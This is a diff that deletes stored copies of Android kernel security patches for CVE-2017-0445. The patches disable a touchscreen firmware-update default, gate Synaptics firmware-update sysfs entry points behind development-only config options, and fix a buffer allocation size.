-Date: Fri, 2 Dec 2016 21:56:40 -0800
-Subject: [PATCH] input: touchscreen: disable generic update i/f
-
-Disable the generic touchscreen firmware update hook.
-The generic touchscreen firmware update driver has
-security flaws and is not necessary for Marlin touchscreen
-firmware updates.
-
-synaptics_dsx_htc_2.6 still attempts firmware updates
-via request_firmware on boot with this disabled.
-
-BUG: 32917445
-BUG: 32919560
-BUG: 32769717
-Change-Id: I272a1d1aba16b53647f2dde9dc7ff8b306179b43
-Signed-off-by: Andrew Chant <achant@google.com>
----
- drivers/input/touchscreen/Kconfig | 1 -
- 1 file changed, 1 deletion(-)
-
-diff --git a/drivers/input/touchscreen/Kconfig b/drivers/input/touchscreen/Kconfig
-index b633d17ea8b18..1e7ce91810f41 100644
---- a/drivers/input/touchscreen/Kconfig
-+++ b/drivers/input/touchscreen/Kconfig
-@@ -1020,7 +1020,6 @@ config SECURE_TOUCH
- 
- config TOUCHSCREEN_TOUCH_FW_UPDATE
-         tristate "Touchscreen firmware update"
--        default y
-         help
-           Say Y here to support touch firmware update
- 
diff --git a/Patches/Linux_CVEs/CVE-2017-0445/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2017-0445/ANY/0002.patch
deleted file mode 100644
index 4db4d28a..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0445/ANY/0002.patch
+++ /dev/null
@@ -1,373 +0,0 @@
-From 367e64520dba1652d8f6d0ac1ebda3cab0f9e374 Mon Sep 17 00:00:00 2001
-From: Andrew Chant <achant@google.com>
-Date: Tue, 6 Dec 2016 17:03:07 -0800
-Subject: [PATCH] input: synaptics_dsx: remove update sysfs entries
-
-Remove sysfs entrypoints to fw_update module.
-Also fixes request_firmware firmware update path.
-
-BUG: 32769717
-Change-Id: Iab7ff456288a18be71636b84c8e3008390c0d872
-Signed-off-by: Andrew Chant <achant@google.com>
----
- .../touchscreen/synaptics_dsx_htc_2.6/Kconfig      | 10 ++++
- .../synaptics_dsx_fw_update.c                      | 53 ++++++++++++++++++++--
- 2 files changed, 60 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/input/touchscreen/synaptics_dsx_htc_2.6/Kconfig b/drivers/input/touchscreen/synaptics_dsx_htc_2.6/Kconfig
-index 30c64910d7dd5..60f536c8ee150 100644
---- a/drivers/input/touchscreen/synaptics_dsx_htc_2.6/Kconfig
-+++ b/drivers/input/touchscreen/synaptics_dsx_htc_2.6/Kconfig
-@@ -59,6 +59,16 @@ config TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_HTC_v26
- 	  To compile this driver as a module, choose M here: the
- 	  module will be called synaptics_dsx_fw_update.
- 
-+config TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_SYSFS_HTC_v26
-+	bool "Synaptics DSX firmware update sysfs attributes"
-+	depends on TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_HTC_v26
-+	help
-+	  Say Y here to enable support for sysfs attributes for
-+	  performing firmware update in a development environment.
-+	  This does not affect the core or other subsystem attributes.
-+
-+	  If unsure, say N.
-+
- config TOUCHSCREEN_SYNAPTICS_DSX_TEST_REPORTING_HTC_v26
- 	tristate "Synaptics DSX v2.6 test reporting module"
- 	depends on TOUCHSCREEN_SYNAPTICS_DSX_CORE_HTC_v26
-diff --git a/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_fw_update.c b/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_fw_update.c
-index f7d5dbdd69b53..aff460c13f257 100644
---- a/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_fw_update.c
-+++ b/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_fw_update.c
-@@ -140,6 +140,7 @@ static int fwu_do_reflash(void);
- 
- static int fwu_recovery_check_status(void);
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_SYSFS_HTC_v26
- static ssize_t fwu_sysfs_show_image(struct file *data_file,
- 		struct kobject *kobj, struct bin_attribute *attributes,
- 		char *buf, loff_t pos, size_t count);
-@@ -192,6 +193,7 @@ static ssize_t fwu_sysfs_guest_code_block_count_show(struct device *dev,
- 
- static ssize_t fwu_sysfs_write_guest_code_store(struct device *dev,
- 		struct device_attribute *attr, const char *buf, size_t count);
-+#endif
- 
- enum f34_version {
- 	F34_V0 = 0,
-@@ -708,6 +710,7 @@ struct synaptics_rmi4_fwu_handle {
- #endif
- };
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_SYSFS_HTC_v26
- static struct bin_attribute dev_attr_data = {
- 	.attr = {
- 		.name = "data",
-@@ -765,11 +768,15 @@ static struct device_attribute attrs[] = {
- 			synaptics_rmi4_show_error,
- 			fwu_sysfs_write_guest_code_store),
- };
-+#endif
- 
- static struct synaptics_rmi4_fwu_handle *fwu;
- 
- DECLARE_COMPLETION(fwu_remove_complete);
-+
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_SYSFS_HTC_v26
- DEFINE_MUTEX(fwu_sysfs_mutex);
-+#endif
- 
- /* Check offset + size <= bound.  true if in bounds, false otherwise. */
- static bool in_bounds(unsigned long offset, unsigned long size,
-@@ -923,6 +930,7 @@ static int fwu_f51_force_data_init(void)
- }
- #endif
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_SYSFS_HTC_v26
- static int fwu_allocate_read_config_buf(unsigned int count)
- {
- 	struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data;
-@@ -942,6 +950,7 @@ static int fwu_allocate_read_config_buf(unsigned int count)
- 
- 	return 0;
- }
-+#endif
- 
- static void fwu_compare_partition_tables(void)
- {
-@@ -2471,6 +2480,7 @@ static int fwu_write_f34_blocks(unsigned char *block_ptr,
- 	return retval;
- }
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_SYSFS_HTC_v26
- static int fwu_read_f34_v7_blocks(unsigned short block_cnt,
- 		unsigned char command)
- {
-@@ -2624,6 +2634,7 @@ static int fwu_read_f34_blocks(unsigned short block_cnt, unsigned char cmd)
- 
- 	return retval;
- }
-+#endif
- 
- static int fwu_get_image_firmware_id(unsigned int *fw_id)
- {
-@@ -2645,7 +2656,7 @@ static int fwu_get_image_firmware_id(unsigned int *fw_id)
- 		}
- 
- 		strptr += 2;
--		firmware_id = kzalloc(MAX_FIRMWARE_ID_LEN, GFP_KERNEL);
-+		firmware_id = kzalloc(MAX_FIRMWARE_ID_LEN + 1, GFP_KERNEL);
- 		if (!firmware_id) {
- 			dev_err(rmi4_data->pdev->dev.parent,
- 					"%s: Failed to alloc mem for firmware_id\n",
-@@ -3032,6 +3043,7 @@ static int fwu_check_ui_configuration_size(void)
- 	return 0;
- }
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_SYSFS_HTC_v26
- static int fwu_check_dp_configuration_size(void)
- {
- 	unsigned short block_count;
-@@ -3065,6 +3077,7 @@ static int fwu_check_pm_configuration_size(void)
- 
- 	return 0;
- }
-+#endif
- 
- #ifndef SYNA_SIMPLE_UPDATE
- static int fwu_check_bl_configuration_size(void)
-@@ -3085,6 +3098,7 @@ static int fwu_check_bl_configuration_size(void)
- }
- #endif
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_SYSFS_HTC_v26
- static int fwu_check_guest_code_size(void)
- {
- 	unsigned short block_count;
-@@ -3100,6 +3114,7 @@ static int fwu_check_guest_code_size(void)
- 
- 	return 0;
- }
-+#endif
- 
- static int fwu_erase_configuration(void)
- {
-@@ -3199,6 +3214,7 @@ static int fwu_erase_utility_parameter(void)
- }
- #endif
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_SYSFS_HTC_v26
- static int fwu_erase_guest_code(void)
- {
- 	int retval;
-@@ -3222,6 +3238,7 @@ static int fwu_erase_guest_code(void)
- 
- 	return 0;
- }
-+#endif
- 
- static int fwu_erase_all(void)
- {
-@@ -3275,7 +3292,7 @@ static int fwu_erase_all(void)
- 
- #ifndef SYNA_SIMPLE_UPDATE
- 	if (fwu->flash_properties.has_disp_config &&
--			fwu->img.contains_disp_config) {		
-+			fwu->img.contains_disp_config) {
- 		fwu->config_area = DP_CONFIG_AREA;
- 		retval = fwu_erase_configuration();
- 		if (retval < 0)
-@@ -3424,6 +3441,7 @@ static int fwu_write_ui_configuration(void)
- 	return fwu_write_configuration();
- }
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_SYSFS_HTC_v26
- static int fwu_write_dp_configuration(void)
- {
- 	fwu->config_area = DP_CONFIG_AREA;
-@@ -3443,6 +3461,7 @@ static int fwu_write_pm_configuration(void)
- 
- 	return fwu_write_configuration();
- }
-+#endif
- 
- #ifndef SYNA_SIMPLE_UPDATE
- static int fwu_write_flash_configuration(void)
-@@ -3476,6 +3495,7 @@ static int fwu_write_flash_configuration(void)
- }
- #endif
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_SYSFS_HTC_v26
- static int fwu_write_guest_code(void)
- {
- 	int retval;
-@@ -3490,6 +3510,7 @@ static int fwu_write_guest_code(void)
- 
- 	return 0;
- }
-+#endif
- 
- static int fwu_write_lockdown(void)
- {
-@@ -3998,6 +4019,7 @@ static int fwu_do_reflash(void)
- 	return retval;
- }
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_SYSFS_HTC_v26
- static int fwu_do_read_config(void)
- {
- 	int retval;
-@@ -4076,6 +4098,7 @@ static int fwu_do_read_config(void)
- 
- 	return retval;
- }
-+#endif
- 
- static int fwu_do_lockdown_v7(void)
- {
-@@ -4212,6 +4235,7 @@ static int fwu_do_restore_f51_cal_data(void)
- }
- #endif
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_SYSFS_HTC_v26
- static int fwu_start_write_guest_code(void)
- {
- 	int retval;
-@@ -4417,6 +4441,7 @@ static int fwu_start_write_config(void)
- 
- 	return retval;
- }
-+#endif
- 
- static int fwu_start_reflash(void)
- {
-@@ -4472,6 +4497,7 @@ static int fwu_start_reflash(void)
- 				"%s: Firmware image size = %d\n",
- 				__func__, (unsigned int)fw_entry->size);
- 		fwu->image = fw_entry->data;
-+		fwu->image_size = fw_entry->size;
- 	}
- 
- 	retval = fwu_parse_image_info();
-@@ -4691,6 +4717,7 @@ static int fwu_recovery_check_status(void)
- 	return 0;
- }
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_SYSFS_HTC_v26
- static int fwu_recovery_erase_completion(void)
- {
- 	int retval;
-@@ -4965,6 +4992,7 @@ static int fwu_start_recovery(void)
- 
- 	return retval;
- }
-+#endif
- 
- #ifdef HTC_FEATURE
- static int fwu_do_write_config(uint8_t *config_data)
-@@ -5219,8 +5247,10 @@ static void fwu_startup_fw_update_work(struct work_struct *work)
- 	}
- #endif
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_SYSFS_HTC_v26
- 	/* Prevent sysfs operations during initial update. */
- 	mutex_lock(&fwu_sysfs_mutex);
-+#endif
- 
- #ifdef HTC_FEATURE
- 	wake_lock(&fwu->fwu_wake_lock);
-@@ -5236,11 +5266,14 @@ static void fwu_startup_fw_update_work(struct work_struct *work)
- #else
- 	synaptics_fw_updater(NULL);
- #endif
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_SYSFS_HTC_v26
- 	mutex_unlock(&fwu_sysfs_mutex);
-+#endif
- 	return;
- }
- #endif
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_SYSFS_HTC_v26
- static ssize_t fwu_sysfs_show_image(struct file *data_file,
- 		struct kobject *kobj, struct bin_attribute *attributes,
- 		char *buf, loff_t pos, size_t count)
-@@ -5674,6 +5707,7 @@ static ssize_t fwu_sysfs_write_guest_code_store(struct device *dev,
- 	mutex_unlock(&fwu_sysfs_mutex);
- 	return retval;
- }
-+#endif
- 
- static void synaptics_rmi4_fwu_attn(struct synaptics_rmi4_data *rmi4_data,
- 		unsigned char intr_mask)
-@@ -5690,7 +5724,9 @@ static void synaptics_rmi4_fwu_attn(struct synaptics_rmi4_data *rmi4_data,
- static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data)
- {
- 	int retval;
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_SYSFS_HTC_v26
- 	unsigned char attr_count;
-+#endif
- 	struct pdt_properties pdt_props;
- 
- 	if (fwu) {
-@@ -5758,6 +5794,7 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data)
- 	fwu->do_lockdown = DO_LOCKDOWN;
- 	fwu->initialized = true;
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_SYSFS_HTC_v26
- 	retval = sysfs_create_bin_file(&rmi4_data->input_dev->dev.kobj,
- 			&dev_attr_data);
- 	if (retval < 0) {
-@@ -5778,6 +5815,7 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data)
- 			goto exit_remove_attrs;
- 		}
- 	}
-+#endif
- 
- #ifdef DO_STARTUP_FW_UPDATE
- #ifdef HTC_FEATURE
-@@ -5800,13 +5838,19 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data)
- 
- 	return 0;
- 
-+#if defined(CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_SYSFS_HTC_v26) || \
-+	defined(F51_DISCRETE_FORCE)
- exit_remove_attrs:
-+#endif
-+
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_SYSFS_HTC_v26
- 	for (attr_count--; attr_count >= 0; attr_count--) {
- 		sysfs_remove_file(&rmi4_data->input_dev->dev.kobj,
- 				&attrs[attr_count].attr);
- 	}
- 
- 	sysfs_remove_bin_file(&rmi4_data->input_dev->dev.kobj, &dev_attr_data);
-+#endif
- 
- exit_free_mem:
- 	kfree(fwu->image_name);
-@@ -5821,8 +5865,9 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data)
- 
- static void synaptics_rmi4_fwu_remove(struct synaptics_rmi4_data *rmi4_data)
- {
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_SYSFS_HTC_v26
- 	unsigned char attr_count;
--
-+#endif
- 	if (!fwu)
- 		goto exit;
- 
-@@ -5835,12 +5880,14 @@ static void synaptics_rmi4_fwu_remove(struct synaptics_rmi4_data *rmi4_data)
- #endif
- #endif
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_SYSFS_HTC_v26
- 	for (attr_count = 0; attr_count < ARRAY_SIZE(attrs); attr_count++) {
- 		sysfs_remove_file(&rmi4_data->input_dev->dev.kobj,
- 				&attrs[attr_count].attr);
- 	}
- 
- 	sysfs_remove_bin_file(&rmi4_data->input_dev->dev.kobj, &dev_attr_data);
-+#endif
- 
- #ifdef F51_DISCRETE_FORCE
- 	kfree(fwu->cal_data);
diff --git a/Patches/Linux_CVEs/CVE-2017-0445/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2017-0445/ANY/0003.patch
deleted file mode 100644
index c2e986ef..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0445/ANY/0003.patch
+++ /dev/null
@@ -1,210 +0,0 @@
-From 2615c5f302441568e6dd20007bc5246d72837e80 Mon Sep 17 00:00:00 2001
-From: Andrew Chant <achant@google.com>
-Date: Tue, 6 Dec 2016 19:19:26 -0800
-Subject: [PATCH] input: synaptics_dsx: remove update sysfs entries
-
-Remove sysfs entrypoints to fw_update module.
-
-BUG: 32769717
-Change-Id: I425761af84ed5c31cc5902b4f49c4981a49f3af0
-Signed-off-by: Andrew Chant <achant@google.com>
----
- drivers/input/touchscreen/synaptics_dsx25/Kconfig  | 10 ++++++++
- .../synaptics_dsx25/synaptics_dsx_fw_update.c      | 27 ++++++++++++++++++++--
- 2 files changed, 35 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/input/touchscreen/synaptics_dsx25/Kconfig b/drivers/input/touchscreen/synaptics_dsx25/Kconfig
-index 36661fc9d6a2d..218a6c3c96467 100644
---- a/drivers/input/touchscreen/synaptics_dsx25/Kconfig
-+++ b/drivers/input/touchscreen/synaptics_dsx25/Kconfig
-@@ -59,6 +59,16 @@ config TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE
- 	  To compile this driver as a module, choose M here: the
- 	  module will be called synaptics_dsx_fw_update.
- 
-+config TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS
-+	bool "Synaptics DSX firmware update sysfs attributes"
-+	depends on TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE
-+	help
-+	  Say Y here to enable support for sysfs attributes for
-+	  performing firmware update in a development environment.
-+	  This does not affect the core or other subsystem attributes.
-+
-+	  If unsure, say N.
-+
- config TOUCHSCREEN_SYNAPTICS_DSX25_ACTIVE_PEN
- 	tristate "Synaptics DSX active pen module"
- 	depends on TOUCHSCREEN_SYNAPTICS25_DSX_CORE
-diff --git a/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c b/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c
-index 323f65891b458..8cad4d3b3a9d9 100755
---- a/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c
-+++ b/drivers/input/touchscreen/synaptics_dsx25/synaptics_dsx_fw_update.c
-@@ -105,6 +105,7 @@ static int fwu_do_reflash(void);
- 
- static int fwu_recovery_check_status(void);
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS
- static ssize_t fwu_sysfs_show_image(struct file *data_file,
- 		struct kobject *kobj, struct bin_attribute *attributes,
- 		char *buf, loff_t pos, size_t count);
-@@ -157,6 +158,7 @@ static ssize_t fwu_sysfs_guest_code_block_count_show(struct device *dev,
- 
- static ssize_t fwu_sysfs_write_guest_code_store(struct device *dev,
- 		struct device_attribute *attr, const char *buf, size_t count);
-+#endif
- 
- enum f34_version {
- 	F34_V0 = 0,
-@@ -595,6 +597,7 @@ struct synaptics_rmi4_fwu_handle {
- 	struct work_struct fwu_work;
- };
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS
- static struct bin_attribute dev_attr_data = {
- 	.attr = {
- 		.name = "data",
-@@ -652,12 +655,14 @@ static struct device_attribute attrs[] = {
- 			synaptics_rmi4_show_error,
- 			fwu_sysfs_write_guest_code_store),
- };
-+#endif
- 
- static struct synaptics_rmi4_fwu_handle *fwu;
- 
- DECLARE_COMPLETION(dsx_fwu_remove_complete);
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS
- DEFINE_MUTEX(fwu_sysfs_mutex);
--
-+#endif
- static bool tp_2k_panel = false;
- /**
-  * early_param: Parse system early startup parameters.
-@@ -3057,6 +3062,7 @@ static int fwu_do_reflash(void)
- 	return retval;
- }
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS
- static int fwu_do_read_config(void)
- {
- 	int retval;
-@@ -3136,6 +3142,7 @@ static int fwu_do_read_config(void)
- 
- 	return retval;
- }
-+#endif
- 
- static int fwu_do_lockdown(void)
- {
-@@ -3173,6 +3180,7 @@ static int fwu_do_lockdown(void)
- 	return retval;
- }
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS
- static int fwu_start_write_guest_code(void)
- {
- 	int retval;
-@@ -3348,6 +3356,7 @@ static int fwu_start_write_config(void)
- 
- 	return retval;
- }
-+#endif
- 
- static void synaptics_refresh_configid(void)
- {
-@@ -3584,6 +3593,7 @@ static int fwu_recovery_check_status(void)
- 	return 0;
- }
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS
- static int fwu_recovery_erase_all(void)
- {
- 	int retval;
-@@ -3778,6 +3788,7 @@ static int fwu_start_recovery(void)
- 
- 	return retval;
- }
-+#endif
- 
- int synaptics_dsx25_fw_updater(const unsigned char *fw_data)
- {
-@@ -3838,6 +3849,7 @@ static void fwu_startup_fw_update_work(struct work_struct *work)
- }
- #endif
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS
- static ssize_t fwu_sysfs_show_image(struct file *data_file,
- 		struct kobject *kobj, struct bin_attribute *attributes,
- 		char *buf, loff_t pos, size_t count)
-@@ -4236,6 +4248,7 @@ static ssize_t fwu_sysfs_write_guest_code_store(struct device *dev,
- 	mutex_unlock(&fwu_sysfs_mutex);
- 	return retval;
- }
-+#endif
- 
- static void synaptics_rmi4_fwu_attn(struct synaptics_rmi4_data *rmi4_data,
- 		unsigned char intr_mask)
-@@ -4252,7 +4265,9 @@ static void synaptics_rmi4_fwu_attn(struct synaptics_rmi4_data *rmi4_data,
- static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data)
- {
- 	int retval;
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS
- 	unsigned char attr_count;
-+#endif
- 	struct pdt_properties pdt_props;
- 
- 	if (fwu) {
-@@ -4319,6 +4334,7 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data)
- 			&fwu->fwu_work);
- #endif
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS
- 	retval = sysfs_create_bin_file(&rmi4_data->input_dev->dev.kobj,
- 				       &dev_attr_data);
- 	if (retval < 0) {
-@@ -4339,9 +4355,11 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data)
- 			goto exit_remove_attrs;
- 		}
- 	}
-+#endif
- 
- 	return 0;
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS
- exit_remove_attrs:
- 	for (attr_count--; attr_count >= 0; attr_count--) {
- 		sysfs_remove_file(&rmi4_data->input_dev->dev.kobj,
-@@ -4349,8 +4367,9 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data)
- 	}
- 
- 	sysfs_remove_bin_file(&rmi4_data->input_dev->dev.kobj, &dev_attr_data);
--
- exit_destroy_work:
-+#endif
-+
- #ifdef DO_STARTUP_FW_UPDATE
- 	cancel_work_sync(&fwu->fwu_work);
- 	flush_workqueue(fwu->fwu_workqueue);
-@@ -4370,7 +4389,9 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data)
- 
- static void synaptics_rmi4_fwu_remove(struct synaptics_rmi4_data *rmi4_data)
- {
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS
- 	unsigned char attr_count;
-+#endif
- 
- 	if (!fwu)
- 		goto exit;
-@@ -4381,12 +4402,14 @@ static void synaptics_rmi4_fwu_remove(struct synaptics_rmi4_data *rmi4_data)
- 	destroy_workqueue(fwu->fwu_workqueue);
- #endif
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX25_FW_UPDATE_SYSFS
- 	for (attr_count = 0; attr_count < ARRAY_SIZE(attrs); attr_count++) {
- 		sysfs_remove_file(&rmi4_data->input_dev->dev.kobj,
- 				&attrs[attr_count].attr);
- 	}
- 
- 	sysfs_remove_bin_file(&rmi4_data->input_dev->dev.kobj, &dev_attr_data);
-+#endif
- 
- 	kfree(fwu->read_config_buf);
- 	kfree(fwu->image_name);
diff --git a/Patches/Linux_CVEs/CVE-2017-0445/ANY/0004.patch b/Patches/Linux_CVEs/CVE-2017-0445/ANY/0004.patch
deleted file mode 100644
index ed4d450e..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0445/ANY/0004.patch
+++ /dev/null
@@ -1,181 +0,0 @@
-From fe160e51f02ee5db529c2e84ac8364c89cce005e Mon Sep 17 00:00:00 2001
-From: Andrew Chant <achant@google.com>
-Date: Tue, 6 Dec 2016 20:59:01 -0800
-Subject: [PATCH] input: synaptics_dsx: remove some sysfs nodes.
-
-Remove most sysfs entrypoints to fw_update module.
-Retains check_fw, which is triggered from an
-init script.
-
-BUG: 32769717
-Change-Id: I710cb37a8b5382dce7aa6a1d8748be5853a18a7a
-Signed-off-by: Andrew Chant <achant@google.com>
----
- drivers/input/touchscreen/Kconfig               | 10 ++++++++++
- drivers/input/touchscreen/synaptics_fw_update.c | 20 ++++++++++++++++++++
- 2 files changed, 30 insertions(+)
-
-diff --git a/drivers/input/touchscreen/Kconfig b/drivers/input/touchscreen/Kconfig
-index a42fea5862af2..64266998c2290 100644
---- a/drivers/input/touchscreen/Kconfig
-+++ b/drivers/input/touchscreen/Kconfig
-@@ -1019,6 +1019,16 @@ config TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE
- 	  To compile this driver as a module, choose M here: the
- 	  module will be called synaptics_dsx_fw_update.
- 
-+config TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_EXTRA_SYSFS
-+	bool "Synaptics DSX firmware update extra sysfs attributes"
-+	depends on TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE
-+	help
-+	  Say Y here to enable support for extra sysfs attributes
-+	  supporting firmware update in a development environment.
-+	  This does not affect the core or other subsystem attributes.
-+
-+	  If unsure, say N.
-+
- config SECURE_TOUCH
- 	bool "Secure Touch"
- 	depends on (TOUCHSCREEN_ATMEL_MXT || TOUCHSCREEN_SYNAPTICS_I2C_RMI4 || \
-diff --git a/drivers/input/touchscreen/synaptics_fw_update.c b/drivers/input/touchscreen/synaptics_fw_update.c
-index 8891f1c836684..360e455a5a51b 100644
---- a/drivers/input/touchscreen/synaptics_fw_update.c
-+++ b/drivers/input/touchscreen/synaptics_fw_update.c
-@@ -1331,6 +1331,7 @@ static int fwu_do_write_config(void)
- 	return retval;
- }
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_EXTRA_SYSFS
- static int fwu_start_write_config(void)
- {
- 	int retval;
-@@ -1383,6 +1384,7 @@ static int fwu_start_write_config(void)
- 
- 	return retval;
- }
-+#endif
- 
- static int fwu_do_write_lockdown(bool reset)
- {
-@@ -1430,6 +1432,7 @@ static int fwu_do_write_lockdown(bool reset)
- 	return retval;
- }
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_EXTRA_SYSFS
- static int fwu_start_write_lockdown(void)
- {
- 	if (parse_header())
-@@ -1533,6 +1536,7 @@ static int fwu_do_read_config(void)
- exit:
- 	return retval;
- }
-+#endif
- 
- static int fwu_do_reflash(void)
- {
-@@ -1767,6 +1771,7 @@ int synaptics_fw_updater(void)
- }
- EXPORT_SYMBOL(synaptics_fw_updater);
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_EXTRA_SYSFS
- static ssize_t fwu_sysfs_show_image(struct file *data_file,
- 		struct kobject *kobj, struct bin_attribute *attributes,
- 		char *buf, loff_t pos, size_t count)
-@@ -2021,6 +2026,7 @@ static ssize_t fwu_sysfs_write_lockdown_store(struct device *dev,
- 	mutex_unlock(&fwu_sysfs_mutex);
- 	return retval;
- }
-+#endif
- 
- static ssize_t fwu_sysfs_check_fw_store(struct device *dev,
- 		struct device_attribute *attr, const char *buf, size_t count)
-@@ -2044,6 +2050,7 @@ static ssize_t fwu_sysfs_check_fw_store(struct device *dev,
- 	return count;
- }
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_EXTRA_SYSFS
- static ssize_t fwu_sysfs_write_config_store(struct device *dev,
- 		struct device_attribute *attr, const char *buf, size_t count)
- {
-@@ -2265,6 +2272,7 @@ static ssize_t fwu_sysfs_package_id_show(struct device *dev,
- 		(pkg_id[1] << 8) | pkg_id[0],
- 		(pkg_id[3] << 8) | pkg_id[2]);
- }
-+#endif
- 
- static int synaptics_rmi4_debug_dump_info(struct seq_file *m, void *v)
- {
-@@ -2298,6 +2306,7 @@ static void synaptics_rmi4_fwu_attn(struct synaptics_rmi4_data *rmi4_data,
- 	return;
- }
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_EXTRA_SYSFS
- static struct bin_attribute dev_attr_data = {
- 	.attr = {
- 		.name = "data",
-@@ -2307,8 +2316,10 @@ static struct bin_attribute dev_attr_data = {
- 	.read = fwu_sysfs_show_image,
- 	.write = fwu_sysfs_store_image,
- };
-+#endif
- 
- static struct device_attribute attrs[] = {
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_EXTRA_SYSFS
- 	__ATTR(fw_name, S_IRUGO | S_IWUSR | S_IWGRP,
- 			fwu_sysfs_image_name_show,
- 			fwu_sysfs_image_name_store),
-@@ -2318,9 +2329,11 @@ static struct device_attribute attrs[] = {
- 	__ATTR(update_fw, S_IWUSR | S_IWGRP,
- 			NULL,
- 			fwu_sysfs_do_reflash_store),
-+#endif
- 	__ATTR(check_fw, S_IWUSR | S_IWGRP,
- 			NULL,
- 			fwu_sysfs_check_fw_store),
